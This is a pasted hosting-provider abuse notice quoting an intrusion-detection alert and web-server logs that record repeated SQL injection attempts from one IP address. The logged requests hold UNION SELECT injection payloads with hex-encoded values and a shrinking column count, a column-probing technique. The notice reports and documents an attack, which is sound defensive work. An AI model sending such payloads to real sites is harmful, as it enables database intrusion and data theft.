Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Slicehost Support
- ________________________
- Rule: 31152 fired (level 13) -> "Multiple SQL injection attempts from
- same souce ip."
- Portion of the log(s):
- 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
- /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
- HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
- 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
- /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
- HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
- 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
- /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
- HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
- 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
- /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
- HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
- 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
- /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
- HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
- 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
- /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
- HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
- 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
- /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
- HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
- 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
- /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
- HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
- 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
- /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
- HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
- NOTES:
- URL Injection attacks typically mean the server for which the IP
- address of the attacker is bound is a compromised server.
Add Comment
Please, Sign In to add comment